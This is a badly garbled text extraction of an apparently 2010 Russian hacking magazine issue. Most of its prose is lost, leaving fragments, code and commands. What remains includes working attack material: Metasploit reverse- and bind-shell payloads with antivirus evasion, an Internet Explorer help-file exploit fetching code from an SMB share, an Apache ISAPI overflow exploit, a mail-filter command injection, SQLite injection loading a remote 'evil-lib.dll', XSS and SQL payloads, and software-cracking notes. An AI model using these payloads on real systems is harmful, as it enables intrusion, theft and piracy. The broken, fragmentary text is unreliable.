(%
&
'
+
(
)
,+*
  











 %0./

230

.3-.
43210/

/"4

3"*%

8889 "3%36

49




2010
04 (74)

VGA

NAS


3

5&

0,-*$,)6/


42!#



/.3



C 31



 

PC_ZONE

Skype' oldversion.com
crackmes.de:

HTTP://WWW
links
, .
The Butterfly
Security Project:
sourceforge.
net/projects/
thebutterflytmp
hackme

Foundstone:
www.foundstone.com
OWASP
InsecureWebApp:
www.owasp.org/index.
php/Category:OWASP_Insecure_Web_
App_Project
BadStore:
www.badstore.net
OWASP
SiteGenerator:
www.owasp.org/
index.php/Owasp_
SiteGenerator

,
. :
nmap', , SSH, , .
, VirtualBox',

forums.heorot.net.
Damn Vulnerable Linux (www.amnvulnerablelinux.org)
. , , .

,
, ,
(SQL-,
XSS ..), , , . LiveCD-
VMware VirtualBox.
De-ICE PenTest ,
. : -,
.
, ,

.
,
. ,
IP- : ,
!.
LiveCD .
de-ice.hackerdemia.com/doku.php.


-,
. ,
? , . cracker
,
, . crackmes,
, , www.crackmes.de www.
tdhack.com. : ,
, ,
-

036

,
. ,
,
.
,
cracking,
Cracking ][ #08/2005.

crackmes'.

,
, , -
. IE8, Vista/W7, , IE
6/7 XP
. : ,
?
Internet Explorer Collection (finalbuilds.edskes.
net/iecollection.htm).
Internet Explorer

.
IE ,
. ,

. ,
:
? ,
- :).
- , ,
www.oldapps.com oldversion.com,
. , ,
Winamp',
0.2 , .


- .
,
, . ?
,
,
.
,
, .
.z
X 05 /136/ 10

S TEP T W I T T E R . C O M / S T E PA H


. Apple ,
Nexus One,
, .
, HTC
, , :
.
,
. . Google
: ,
. ,
?
?

, .
, .
? ,
. ,
- .
, - ,
.
,
, .

,
.
,

. ? , Asus W6F

,
. Synaptics, ..
. ,
, , ,
TouchPad V6.2.

Synaptics, , -

,
iPhone
X 05 /136/ 10


, :
-
. , ,

(forums.hardwarezone.com.sg/showthread.
php?p=44505922).
HP,
!
,
,

.
:
!
Gestures ( ,
).

,
. Synaptics Scrybe (www.uscrybe.com),


gestures.
, : ASUS,
IBM, Dell, Samsung .. ,


BenQ. !
,
!
code.google.com
nihon-nukitescroll (code.google.com/p/nihon-nukite-scroll).

( ) .
, , , . z

037


GreenDog agrrrdog@gmail.com

Easy Hack
1

: -

:
Firewall .
, ,
. ,
, , ,
, backconnect . , . , DNS.
, ( ). - .
DNS, dnscat (- netcat).
:
DNS example.com,
. , somedata.example.com,
DNS-. 150 ,
, .
, ,
.

, ?!
, Ron dnscat
! metasploit.
,
. , !
, :
1. metasploit.
2. : skullsecurity.org/blogdata/dnscat-shell-win32.rb
( DVD).

3. metasploit modules/payloads/singles/windows/.
4. dnscat- metasploit,
:
) dnscat (skullsecurity.org/wiki/index.php/Dnscat);

: ,

EXE, ZIP, DLL ..

:
,
, ,
, -exe, -zip, -dll proxy. , , .
, . :

038

icecast_
header dnscat-
, , dnscat!
) sudo ./dnscat listen;
:
1. :
msf > use exploit/windows/http/icecast_header
2. dnscat-:
msf exploit(icecast_header) > set PAYLOAD windows/dnscatshell-win32
PAYLOAD => windows/dnscat-shell-win32
3. :
msf exploit(icecast_header) > set RHOST 192.168.0.2
RHOST => 192.168.0.2
4. DNS-:
msf exploit(icecast_header) > set DOMAIN example.org
DOMAIN => example.org
5. :
msf exploit(icecast_header) > exploit

dnscat- , ..
.
DNS, ,
primary dns IP .

1. .
, ,
. .
.
. .
2. .
, , . :
, , .
c - , jpeg
X 05 /136/ 10

pdf, . exe, proxy


jpeg.
c php allow_url_fopen php.ini,
.
:
<?php
echo GET[l]...$_GET[t].<br>; // URL
$name=rand(1,100); //
$file = file_get_contents($_GET[l]...$_GET[t]); //

$fp=fopen($name.jpg,wb);//
fputs($fp,$file);//

fclose($fp);
echo <a href=$name.jpg>download</a>;//

?>

! :
http://127.0.0.1/jpg.php?l=http://download.qip.ru/
qip8095&t=exe

. .
-, . : . php.ini.
, , ,
php curl, .

:
. , . ,
metasploit.
1. smb relay.
, smb relay. 10 , -
, NTLM-,
, .
- .
( ), smb relay
man-n-middle , ..
,
.
.
(. ):
1. (attacker) (victim) .
2. (target) 8-
.
3. .
4. .
5. .
, ,
Microsoft 2 .
, Metasploit , smb relay. web-:
1. Microsoft Windows SMB Relay Code
Execution.
2. payload. , generic/shell_bind_tcp.
3. LPORT,
.
4. SMBHOST ip- , .
5. .

, smb-,
smb-host
.
2. smb sniffer.
smb relay ,
. ,
X 05 /136/ 10

metasploite

, metasploit capture/smb.
:
1. :
msf > use auxiliary/server/
capture/smb
2.
msf auxiliary(smb) > run

smb relay ,
smb- ,
1122334455667788, .
smb relay .
,
? .
:
e-mail, html-
:
<img src="\\Attacker\SHARE\
file.jpg">

,
,

.
, , XSS ,
, DNS, ARP.
, securitylab.ru/contest/212100.
php securitylab.ru/analytics/362448.php:
$request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;

039

Windows NT 5.1; MyIE2)\r\n";


$request .= "Host: " . $host . "\r\n";
$request .= "Content-length: ". strlen($cmd) . "\r\n";
$request .= "Connection: Keep-Alive\r\n";
$request .= " Cache-Control: no-cache\r\n";
$request .= "\r\n";
$request .= $cmd . "\r\n";
$socket = fsockopen($host, $port ? $port : 80);
fputs($socket, $request);
while(!feof($socket))

: CMS
.

: .
cms. : , Google,
cms .
:
1.
2.
3.
4.
5.
7.

html- .
java-.
robots.txt.
.
http- cookies.
(ERROR404).

, - , -, :
builtwith.com
webmastercoffee.com

echo fgets($socket, 1024);


fclose($socket);
}
?>

3. :
http://localhost/input.php?host=www.example.
com&script=index.php?page=&cmd=phpinfo()

4. :).

2ip.ru

cms,
, ,


.
,
,

.

Wappalyzer
cms Wappalyzer
firefox.
, ,
.
.
Wappalyzer. :
1. Wappalyzer.
2. zip .
3. \chrome\content\overlay.js.

: IP-
.

:
- . - . ,
. tcp/ip
,
, . ,
.
, IP ,
/ NAT. .
, , XSS -
, .
IP. ,
, XSS-, .
, , , PHP-
, , IP .
,
NAT. . ?
! Metasploit.
, Decloak: DeAnoynmized.
, , php (
) :
<?php $id=md5("blablabla" . $_SERVER['REMOTE_ADDR'] .
$_SERVER[REMOTE_PORT] . time() . " blablabla ");

040

http://decloak.net/report.html
$log= $id."-".$_SERVER['REMOTE_ADDR']."\r\n";
$fp=fopen("iplog.txt","a");//
fputs($fp, $log); //
fclose($fp);
?>
<html><head><meta http-equiv="Content-Type" content="text/
html; charset=utf-8" />
<title> </title></head><body>
<p><img src="001.gif" width=200 height="153" /></p>
<iframe src=http://decloak.net/decloak.html?cid=<?php echo
$id; ?>&word=0&itunes=0&quicktime=0" width="0" height="0"
scrolling="no"></iframe> </body></html>

, , ,
, decloak.net/decloak.html. IP
decloak.net/report.html?cid=<unicid>&format=text

<unicid> 32 id .
iplog.txt, :

X 05 /136/ 10

d50712b92c93b98d063735612a6b78ea-127.0.0.1
id IP ,
&word=0&itunes=0&quicktime=0

,
decloak IP-,
.
IP, , XSS,
, 32- :
<iframe src=http://decloak.net/decloak.html?cid=<unicid>&word=0&
itunes=0&quicktime=0 width=0 height=0 scrolling=no></iframe>

ID.
,
jpeg, , .htaccess , jpeg php.
AddHandler application/x-httpd-php .jpeg

, Tor-,
IP-.
, ,
,
decloak.net.

: ,
.

:
- .
. , .
.
1. - . -,
.
2. .
3. , , . ,
100% .
4. , . Metasploit.
Metasploit : ,
- . , , -
Metasploit , .
msfpayload windows/shell/reverse_tcp LHOST=192.168.146.128,L
PORT=5555 X > reverse.exe

, mfsconsole,
Metasploit payload.
exe- , 5555
192.168.146.128. X ,
exe-. :
C
P
J
V
y
R


Perl
JavaScript
VBA
Ruby

. , . :
msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_
tcp LHOST=192.168.146.128 LPORT=5555 E

msfcli Metasploit.
, reverse.exe , 5555
. ,
payload Metasploit .
, , . reverse.exe
21 41, virustotal.com (. ).
? Metasploit msfencode. , ,
, -.
. :

reverse.exe. 21 41
PORT=5555 R | msfencode -c 5 - e x86/shikata_ga_nai -x notepad.
exe -t exe > reverspad.exe

msfpayload ,
, msfencode.
:
-c 5 -e x86/shikata_ga_nai (5 ) shikata_ga_nai:
-x notepad.exe msfencode - -
. , notepad.exe ,
.
-t , .. executable.
. Msfencode
PE- , , .text
. exe-,
.
. -, -, -, reverspad.exe -- notepad.exe.
, .
. , ,
. ,
reverspad.exe (. ). , msfencode,
. z
reverspad.exe. 2 41.

msfpayload windows/shell/reverse_tcp LHOST=192.168.146.128,L


X 05 /136/ 10

041


, Digital Security dookie@inbox.ru

, Acrobat Reader .

01


INTERNET EXPLORER

TARGETS
Internet Explorer 7/8
Windows XP
Windows 2000/2003
BRIEF

(Maurycy Prodeus),
Internet Explorer.
, MsgBox(), Visual Basic-,
.hlp-. , <F1> MsgBox().
, , WebDAV.
, .hlp
, ExecFile().
EXPLOIT
,
. ,
HLP <F1>.
,
,
, , , - , / . ,
ie_winhlp32. , ,
80 , URIPATH

042

ROP .

/. . ,

. , ,
. , ,
HLP- EXE,
.
HLP-. Microsoft Help Workshop
4 ( ). HLP-
RTF-, Worde.
(->). . : $ ZLO, # IDH_1
X 05 /136/ 10

. !.
F1

. ,
free, IP 10.10.10.10. :
!ExecFile(cmd,/c net use z: \\\\10.10.10.10\\free)
!ExecFile(cmd,/c wscript z:\\exec.vbs)

, ,
exec.vbs. exec.vbs:
Dim WshShell,oExec
Set WshShell = wscript.createobject("wscript.shell")
Set oExec = WshShell.Exec("z:\zlo.exe")

. ,
? , ,
,
cmd.exe, ,
. ,
wscript , , ,
cmd.exe. , , . cygwin
:
msfpayload windows/shell_bind_tcp LPORT=4444 X > zlo.exe
X 05 /136/ 10

HLP-, Microsoft Help Workshop,


File, RTF. Map : IDH_1=1.
Compile .hlp.
free, HLP, EXE VBS . , , :
<html>
<script type="text/vbscript">
big = "\\10.10.10.10\free\EXEC.HLP"
MsgBox "please press F1 to save the world", ,
"please save the world", big, 1
MsgBox "press F1 to close this annoying popup", ,"",
big, 1
</script>
</html>

<F1>
, 4444 . big HLP ,
, , (, IDH_1=1?).

SOLUTION
Microsoft <F1>.
, :
echo Y | cacls "%windir%\winhlp32.exe" /E /P everyone:N

043

: "pwn-isapi". ,
.
:
...
//
serverIP = string(argv[1]);
isapiDLL = string(argv[2]);

, 0-day IE6/7.

. Internet Explorer (-> ->->->).

02


APACHE ISAPI_
MODULE

TARGETS
Apache <= 2.2.14
Windows XP
Windows 2000/2003
BRIEF
isapi - Apache Windows
, -
IIS. . , -
.
DLL-, , ,
cgi-bin. DLL : "AddHandler isapi-handler .dll".
ISAPI-,
, . ,
ISAPI- (RESET-), , .
, isapi, , ,
, ,
.
EXPLOIT
- (Brett Gervasoni), ,
. POST- ISAPI- , ,
,
. , -http-. A (0x41 INC ECX:
NOP) . , ,
, ,
ISAPI. ,
,
-. ,

, , , .
, sos.txt .

044

// ''
memset(accept, 'A', 170);
memset(referer, 'A', 732);
memset(cookie, 'A', 5375);
memset(random, 'A', 7603);
memset(postData, 'A', 23378);
memset(footer, 'A', 298);
//
triggerVuln = "POST /cgi-bin/" + isapiDLL + " HTTP/1.0\r\n"
"User-Agent: AAAAAAAA\r\n"
"Pragma: no-cache\r\n"
"Proxy-Connection: Keep-Alive\r\n"
"Host: " + serverIP + "\r\n"
"Content-Length: 40334\r\n\r\n" +
string(footer);
//
payload = "POST /cgi-bin/" + isapiDLL + " HTTP/1.0\r\n"
"Accept: " + string(accept) + "\r\n"
...
"Proxy-Connection: Keep-Alive\r\n"
"Okytuasd: " + string(cookie) + string(shellcode)
+ "\r\n" // -
"Asdasdasdasdasd: " + string(random) +
string(shellcode) + "\r\n"
"Asdasda: " + string(random) +
string(shellcode) + "\r\n"
"Sewrwefbui: " + string(random) +
string(shellcode) + "\r\n"
"Qdfasdernu: " + string(random) +
string(shellcode) + "\r\n"
"Cdffew-asdf: " + string(random) +
string(shellcode) + "\r\n"
...
"Content-Length: 25054\r\n\r\n" +
string(postData) + "CCCC" +
string(shellcode) + "BBBB" + string(footer);
//
...
//createConnection -
if (createConnection(serverIP, SERVER_PORT) == 1)
{
printf("- an error occurred connecting to the
server\n");
return 1;
}
...
linger_data.l_onoff = 0;
linger_data.l_linger = 0;
// RESET
setsockopt(sock, SOL_SOCKET, SO_LINGER,
X 05 /136/ 10

BRIEF
0day. ,
IE 6/7. , .
iepeers.dll, ,
, .
EXPLOIT
,
, McAfree,
www.topix21century.com.
. , , ,
( 0day).
:
<button id='trigg' onclick='attack();'
style='display:none'></button>

ISAPI exploit.

(char*)&linger_data, sizeof(linger_data));
setsockopt(sock, SOL_SOCKET, SO_DONTLINGER,
(char*)&linger_data, sizeof(linger_data));
...
sendTransmission(triggerVuln); //
Sleep(2000); // 2 , Apache
WSACancelBlockingCall(); // RESET
...
// , ,
//
...
sendTransmission(payload); // POST
-

, , DEP. DEP,
DoS.

<script language='javascript'>
function attack()
{
heap_spray();
// heap-spray,
var obj = document.createElement('body');
//
obj.addBehavior('#default#userData');
document.appendChild(obj);
//
//
for (i=0; i<10; i++)
{ //
obj.setAttribute('s',window);
//
}
window.status+='';
// windows
}
document.getElementById('trigg').onclick();
//
}
</script></body></html>

,
,
window, .

SOLUTION
- 2.2.15. ,
ISAPI-, .

SOLUTION
IE6/7 DEP. ,
. ,
. Internet Explorer 8 .
Microsoft, .

03

04

INTERNET
EXPLORER

TARGETS
Internet Explorer 6/7
Windows XP/Vista
Windows 2000/2003/2008
X 05 /136/ 10

LIBTIFF
ACROBAT READER

TARGETS
Acrobat Reader 9.0-9.3/8.0-8.2
Windows XP/Vista
Windows 2000/2003/2008

045

BRIEF
PDF ,
, . Acrobat Reader ,
. Flash.
, , PDF
. 2010
PDF . , , .
EXPLOIT

Acrobat Reader. , JavaScript, , , .
libTiff. LibTIFF,
,
TIFF. ,
Adobe libTiff, ,
- , . ,
2006 .
,
*nix . Acrobat Reader

2006 PDF-
(, TIFF *nix, , , ).
DotRange.
TIFFFetchShortPair() libTiff , N
( ) .
_TIFFmemcpy(cp, tif->tif_base + dir->tdir_offset, cc);

cp : cc, . ,
cp , . ,
TIFF- DotRange ,
return-oriented programming (ROP).
-, - . ,
,
.
, -,
, .
, ,
.
TIFF-
, ,
. , .
.
538 , , ,
TIFF_OFSET, ,
.
gen_tiff(). :
tiff += "\x00\x00\x50\x01\x03\x00\xCC\x00\x00\x00\x92\
x20\x00\x00\x00\x00"

046
46

DotRange (\x50\x01 = 0x150) 0xCC. , , 0x98,


. ,
, tiff. ,
ROP-
, ,
.

SOLUTION
Acrobat Reader,
9.3.1.

05

ROOT APACHE SPAMASSASSIN


MILTER PLUGIN

TARGETS
spamass-milter < 0.3.1
BRIEF
Milter Plugin Sendmail,
SpamAssassin, , ,
, .
, ,
, .
Kingcope, : , , , xscreensaver (symlink), MySQL (format string), 0day
Samba (directory traversal) .

, ,
.
: ,
popen().
EXPLOIT
():
sfsistat
mlfi_envrcpt(
SMFICTX* ctx,
char** envrcpt
)
{
struct context *sctx = (struct context*)
smfi_getpriv(ctx);
SpamAssassin* assassin = sctx->assassin;
FILE *p;
#if defined(__FreeBSD__)
int rv;
#endif
debug(D_FUNC, "mlfi_envrcpt: enter");
if (flag_expand)
{
/* RCPT TO: */
char buf[1024];
X 05 /136/ 10

char *fmt="%s -bv \"%s\" 2>&1";


#if defined(HAVE_SNPRINTF)
snprintf(buf, sizeof(buf)-1, fmt, SENDMAIL,
envrcpt[0]); //
#else
/* Kingcope , snprintf. ,
, ?*/
sprintf(buf, fmt, SENDMAIL, envrcpt[0]);
// RCPT TO: buf
#endif

rcpt to: root+:"|touch /tmp/foo"


250 2.1.5 Ok

popen.
root+:, ,
bv sendmail.
touch /tmp/foo. , . , .
:
sendmail bv root+:|touch /tmp/foo 2>&1.

, -

debug(D_RCPT, "calling %s", buf);


#if defined(__FreeBSD__)
rv = pthread_mutex_lock(&popen_mutex);
if (rv)
{
debug(D_ALWAYS,
"Could not lock popen mutex: %s",
strerror(rv));

$ ls -la /tmp/foo
-rw-r--r-- 1 root root 0 2010-03-07 19:46 /tmp/foo

SOLUTION
, .

abort();
}
#endif
/* */
p = popen(buf, "r");
// pipe
if (!p)
{
debug(D_RCPT, "popen
failed(%s). Will not expand
aliases", strerror(errno));
assassin->
expandedrcpt.push_back(
envrcpt[0]);

popen,

execl(shell path, "sh", "-c", <
popen>, (char *)0). fmt
,
stderr,

|, , ,
,
. :
$ nc localhost 25
220 ownthabox ESMTP Postfix
(Ubuntu)
mail from: me@me.com
250 2.1.0 Ok
X 05 /136/ 10

047


d0znp ONsec

,

SQLITE

, .
,
. ,
. , ,
. ,
SQLite .

SQLite
, ,

3306, .
-

. :
,
.
,
.
,
SQLite.
: Symbian, Apple iPhone,

048

Google Android ,
.
,
, -
SQLite Wordpress, phpBB3
. -,
PHP .

SQLITE -

SQLite ,
PHP.
PHP

php_sqlite3 php_sqlite (
3 2, )
php_sqlite3 + php_pdo_sqlite.

, ,
,
.
,
. ,
SQLite3Stmt
prepared statement. ,
MySQL (
Eleanor CMS :) ).
. ,
,
. , . Prepared
Statements , ,
FROM table.
mysql_real_
X 05 /136/ 10

SQLite
,
HTML, XSS.
escape_string()

,
version(). SQLite sqlite_version() ( )
:
sqlite> select sqlite_version();
3.6.23

substr(X,Y)
substr(X,Y,Z): ,
, .
1.
sqlite> select substr('abcdefgh',1,2);
ab


0x00, .
SQLite zeroblob(N). N
0x00 .
,
trim(X,Y).
,
X.
sqlite> select trim('aa12312asd123asda','asd');

, .
, , SQLite .

, !

.
.
MySQL, , sqlite.
org/lang_comment.html
:
--comment
/*comment*/


*/ .
:
SELECT * FROM temp WHERE id=injection-here
/* and groud_id=5

.
, :
SELECT id, text FROM data WHERE id='5'
UNION SELECT user, pass FROM user '
SELECT id, text FROM data WHERE id='5'
UNION SELECT user, pass FROM user '''''
'
SELECT id, text FROM data WHERE id='5'
UNION SELECT user, pass FROM user "
SELECT id, text FROM data WHERE id='5'
UNION SELECT user, pass FROM user """ "

HTTP://WWW
links
oxod.ru
.
.
,
.
http://sqlite.
org/lang.html
SQL
SQLite.


.
sqlite.org/limits.
html

SQLite.
.
sqlite.org/faq.
html



.
sqlite-crypt.com/
documentation.htm


.
AES 1 .

12312asd123

.
,
SQLite, sqlite_compileoption_get(N).
, .
sqlite> select
ENABLE_FTS3
sqlite> select
ENABLE_RTREE
sqlite> select
TEMP_STORE=1
sqlite> select
THREADSAFE=0

sqlite_compileoption_get(0);
sqlite_compileoption_get(1);
sqlite_compileoption_get(2);
sqlite_compileoption_get(3);

, concat() char()
-
.
X 05 /136/ 10

SQLite ,
.
mysql_escape_string. sqlite_escape_
string() sqlite3_escape_
string(). ,
. , SQLite . , .
:
1. \ - / * % _ sqlite_escape_string sqlite3_
escape_string .
2. . .
:

WARNING

warning
!


!
,


049

1. :
$query = 'SELECT data FROM tabl1 where
id="'.sqlite_escape_string($id).'" ';

$query = 'SELECT data FROM tabl1 where


id="'.sqlite3_escape_string($id).'" ';

:
test.php?id=1/**/UNION/**/SELECT/**/
password/**/FROM/**/USERS/**/LIMIT/**/1

2. sqlite_escape_string() sqlite3_escape_
string() HTML
XSS :
<input type='text' value='test''
onclick=javascript:alert(22) '>

3. LIKE, , %
-.
4. \, :
$query = "SELECT data FROM tabl1 where
id='".sqlite_escape_string($id)."'";

$query = SELECT data FROM tabl1 where


id='".sqlite3_escape_string($id)."'";

SQLite .
SQLITE_MASTER,
.
:

test.php?id=\

SQL . ,

HTML, HTML .

MySQL ,
INFORMATION_SCHEMA.
. SQLite
-

TABLE sqlite_master (
type TEXT,
name TEXT,
tbl_name TEXT,
rootpage INTEGER,
sql TEXT
);

. ,

SQL. SQL, .

, sqlite_escape_
string()

, . . , !
,
,
,
SQLITE_TEMP_MASTER.


LOAD_EXTENSION(). , ,
, SQLite
, .

,
.
:
The load_extension(X,Y) function
loads SQLite extensions out of
the shared library file named X
using the entry point Y. If Y is
omitted then the default entry
point of sqlite3_extension_init is
used. The extension can add new
functions or collating sequences,
but cannot modify or delete
existing functions or collating
sequences because those functions
and/or collating sequences might
be used elsewhere in the currently
running SQL statement. To load an
extension that changes or deletes
functions or collating sequences,

050

X 05 /136/ 10

SQL.

Nokia, Mozilla, SQLite


.
use the sqlite3_load_extension()
C-language API.

,
-.
, ,
sqlite3_
extension_init(). -
,
, SQLite, ,
- C++ API.
,
?!

SQLite Win32
:
#ifdef HACK
//'select load_
extension('sqlite_1251.dll', 'hack');
DWORD WINAPI ThreadProc(
sqlite3 *db)
{
Sleep(3000);
sqlite3_extension_init(
db,0,sqlite3_api);
return 0;
}
int __declspec(dllexport)
__cdecl hack()
{
HANDLE hThread;
SQLITE_EXTENSION_INIT2(pApi)
hThread = CreateThread(NULL,
0,ThreadProc,db,0,0);
CloseHandle(hThread);
X 05 /136/ 10

Win-
LOAD_EXTENSION(C:/boot.ini).

return 0;
}
#endif


: theli.is-a-geek.org/blog/
development/sqlite_hack.1024px#comment_
anchor. ,
,
.
,
, -, , ,
-, - .
,
-
-. INTO OUTFILE,
INTO DUMPFILE, LOADFILE()
SQLite . - Win-,
.
SMB:
SELECT data FROM tbl1
WHERE id=5/**/UNION/**/
ALL/**/SELECT/**/LOAD_
EXTENSION("\\10.10.10.10\evil-lib.
dll","bindShell");

,

. , , :
SELECT LOAD_EXTENSION(
'/file/that/does/not/exists');

:
Error: The specified module could
not be found.

, Win :
Error: The specified procedure
could not be found.

, :
Error: %1 is not a valid Win32
application.

,
,

. , ,
,
.

. ,
.

, -,
SQLite. ,

, , SQLite,
. ,
oxod.ru z

051


ELF ICQ 7719116

VS


,
, . ,
,
StarForce Protection System, . , !

( ),


! ,

:
if Enter_User_key = Real_Programm_
Key then
Call Registration_Success (Enter_
User_key)
else
MessageBox.Show ("Wrong KEY!")
end if

100% ,
. ,
shareware-

052

!
- .

Total Video Converter 3.12.
,
( CMP, JMP
), (
),
(onOk). ,
API
MessageBoxA, ,
(
) MessageBox (
42151) (JMP 421508). !
:).
, !

- ,

! ,
(, ,
, ),
( !).
,
,
, , . ?
,

!

( !)
!
, Trial
Free .

? , .
X 05 /136/ 10

:
:)

, .
, :
(
, , )
;
(Trial-, )
;

;

; :
() .
, .
UPX. ,
,
dll .
, , . , .
,
.
HDTunePro 3.50.
: -
, 1 .
, 15 -
. , (
12 ,
16, ?!; , , .
, ,
)
EAX (, 15-0=15). !
!
world-famous CnC3:
Tiberium Wars Electronic Arts ( ).
,
exe-,
. ,
X 05 /136/ 10

, (
). .
! ,
- Secure Mode Failed (-,
!). :
,
! ! ,
Electronic Arts ,
(,
)

! , cnc3.exe , GetDriveTypeA,
CMP EAX, 5, EAX
API .
.
, . ? ,
cnc3game.dat. ,
!
( ) ,
( ) ,
, cnc3.exe!
cnc3game.dat ( \RetailExe\[ ]\
cnc3game.dat) , !
IsDebuggerPresent (, ). ,
(: !) BlueSoleil
IVT Corporation.
:
12(!) (
). ! - ( ) .
API LoadString
,

, LoadString
.
!
IsDebuggerPresent OutpudDebugString.
,
. ! ,
.

Evaluation (,
About),
!

WARNING

warning
,


,
,

053

,
,
!

HDTunePro_ELF edition .
)

,
Evaluation BsSDK.dll (,
, .
,
), ,
Evaluation ,

, , ,
EAX !
,
MessageBoxA. , ,
.
:).
,
, ,
.

054

TVC! :


, . :

.
( BlueSoleil),
.

.
(
)
(, ASProtect) .
. ,
, ,


,
, 100%
, .
,
,
. , .
.


. ,
(,
OEP).
ResourceBuilder.
dll
ASProtect.


OEP, ?

.
(, ,
), ,
,
.
.

,

,

.
,

! , ,
StarForce
( ): ,
? ,
.

: ,

(, ).
, ,

, StarForce, .
, ,
(,
), .
, ,
, !
X 05 /136/ 10


.
!
SoftIce,
, (
) :).
, ,
,


!
,

( Electronic
Arts) :
3ds
Studio Max! ,
. ! ,
,
,
,
.
- .

StarForce
,
, ,
,
( ?

).
,
- ,


. !
,
:

! ,

.
! ,
- ,
, . ,
appdrvrem.exe IdaPro .
SafeDisk
.
StarForce ,
, SafeDisk 4.x
X 05 /136/ 10

IsDebuggerPresent?
IsDebuggerAbsent!
( ),
42h
41h
.
.
!
.
( )
.
.

,
;
, /

-
;

;

,
!
:
-
,
.
StarForce
,
(, ,
), ()

, (,
protect.dll OllyDbg).
: -


( )
.
protect.dll ,
,
,
.
:
KeBugCheckEx,

, ( ),
! !

,

.
.
, : ,


.

,
.
! 100%
,

. -

.

.
:
,
-

055


RAZ0R HTTP://RAZ0R.NAME

KeBugCheckEx,

,

, ResourceBuilder
.



regkey.bin.

.

? ,

:
[ ] = [
] * [
] / [
(, ,
)] * [
]) * [ ]

BlueSoleil .

. ,
, , .

,
.
-

.

( Tiberium Wars

,
),

?
:
( ), ( ), ,
z

IsDebuggerPresent? .

056

X 05 /136/ 10


AMS ax330d@gmail.com

Unicode-
, , Unicode,
, ,
. ! , ,
, .

, , ,
.
.


. 60 ASCII American
Standard Code for Information Interchange
(
), 7-

058

.

ASCII
.
ASCII-

. , ,
.
,

. 8-

.
ISO (International Organization
for Standardization,
) , ISO 8859.
UCS
(Universal Character Set,
). ,
UCS Unicode.
X 05 /136/ 10

Google
Unicode

, . , Unicode
.
Unicode 5.2.
- .
, ,
,
. , ,
.

- UNICODE

, ,
Unicode .
,
.
, Unicode?
.
1 100 000 ,
U+0000 U+10FFFF. ! Unicode
, ,
.
(, 0041 A) ,
, .
Unicode , UTF (Unicode Transformation Formats,
Unicode). :
UTF-7:

. RFC 2152. Unicode, .
UTF-8:
-. ,
1 4 .
, ASCII. U+0000
U+007F.
UTF-16: 2
4 . 2 . UCS-2 , 2
BMP.
UTF-32: 4
, 32 .
21 , 11 .

, 32-X 05 /136/ 10

PUNYCODE
.
DNS - ,
, DNS
ASCII-.
, ,
Unicode- .
.
xn-- Punycode.
, .ru Punycode :
xn--80akozv.ru. Punycode RFC 3492.

.
UTF-32 UCS-4,
.

, UTF-8 UTF-32 ,

UTF-16.
17 , 65536
. , .
BMP Basic MultiPlane.
UTF-16 UTF-32

, UTF-16LE/UTF-32LE, UTF16BE/UTF-32BE, . ,
LE little-endian, BE big-endian. -
.
U+FEFF, BOM,
Byte Order Mask. BOM
UTF-8, .
.
, - . ,
.
4 :

INFO

info
IDNA IDN in
Applications (IDN
),
,

,

.
IETF,


RFC
IDNA2003 RFC
3490.
.

Normalization Form D (NFD):


.
Normalization Form C (NFC):
+ .
Normalization Form KD (NFKD):
.

059

Bidi-

- mozilla.org FireFox IDND

Normalization Form KC (NFKC):


+ .

.

.
,
.

.
, .
, ,
.

, - .

060

,
,
.
,
,
. Unicode ,
, ,
,
. ,

. ,
- , .

IP/ARP/DNS ,
. -

,

.
, o
0, 5 s. , .
-
2000 PayPal, www.unicode.org.
.

Unicode, IDN, Internationalized Domain
Names (
). IDN
.

, ,
! ,
. , . ,
, , .
, IDN-.
, homograph attack, ,
(,
).
,
.

. ,
.

IDNA2003, , 2010 ,
IDNA2008.
X 05 /136/ 10

UTF-8

IDNA2003,
-.


. , Punycode
-
, .
.
Unicode .
- Unicode-, UC-Simlist (Unicode Similarity
List, Unicode). !
,
. , , .
- . ,
,
?
, , evilexe.
txt. ! -
evil[U+202E]txt.exe. ,
? , U+202E RIGHT-TO-LEFT OVERRIDE,
Bidi ( bidirectional)
, ,
.
. RLO, ,
RLO, .
- Mozilla Firfox cve.mitre.org/cgi-bin/
cvename.cgi?name=CVE-2009-3376.

,
(non-shortest form) UTF-8,
. PHP . ,
.
utf8_decode().
. ,
PHP-:
<?php
// ... 1
$id = mysql_real_escape_string($_GET['id']);
// ... 2
$id = utf8_decode($id);
X 05 /136/ 10

XSS-
// ... 3
mysql_query("SELECT 'name' FROM 'deadbeef'
WHERE 'id'='$id'");

, . ,
SQL-. ,
:
/index.php?id=%c0%a7 OR 1=1/*

,
. , . ,
. ,
? ,
.
%c0 %a7 , 11000000 10100111 .
00100111.
UTF-8.

. , (
, ), ,
.
, 110, ,
, 1 .
1
0. ! 11000000 10100111,
%c0%a7.
,
, , ,
addslashes(), mysql_real_escape_string(), magic_
quotes_qpc. ,
. ,
PHP UTF-8 .
,
.

. :
<?php
/**

HTTP://WWW
links
unicode.org

Unicode.

.
macchiato.com/
main

Unicode.
fiddler2.com/
fiddler2 Fiddler, ,
HTTP.
websecuritytool.
codeplex.com
Fiddler

HTTP-.
lookout.net
,
Unicode,

.
sirdarckcat.blogspot.com/2009/10/
couple-of-unicodeissues-on-php-and.
html
sirdarckat
PHP Unicode.
googleblog.blogspot.com/2010/01/
unicode-nearing-50of-web.html



Unicode.

061


RAZ0R HTTP://RAZ0R.NAME

<img alt='I am xxx?rc='http://


src=javascript:onerror=alert(/
xss/)//' />

* UTF-7 XSS PoC


*/
header('Content-Type: text/html;
charset=UTF-7');
$str = "<script>alert('UTF-7
XSS');</script>";
$str = mb_convert_encoding($str,
'UTF-7');
echo htmlentities($str);

,
,
. :
+ADw-script+AD4-alert('UTF-7
XSS')+ADsAPA-/script+AD4-

. ,

.
, .
,
,
.
<meta http-equiv="ContentType" content="text/html;
charset=UTF-7">

, ,

UTF-8.
Google,
XSS-,
UTF-7.
Google sla.ckers.org/forum/
read.php?3,3109.

062

: .
,
.
: , , PHP.
, , (ill-formed),

, U+FFFD, ..,
. -
, .
, PHP UTF-8
.

JavaScript-, SQL-.
,
Eduardo Vela aka sirdarckcat,
, , .
,
, :
<?php
// ... ,
$name = $_GET['name'];
$link = $_GET['link'];
$image = "<img alt='I am $name'
src='http://$link' />";
echo utf8_decode($image);

:
/?name=xxx%f6&link=%20
src=javascript:onerror=alert(/
xss/)//

, PHP
:

? $name
UTF-8 0xF6,
utf8_decode()
2 , . http:// , JavaScript-
. Opera,
,
,
.
,
PHP,
. ,
WAF/IPS
,
,
ASCII-. :
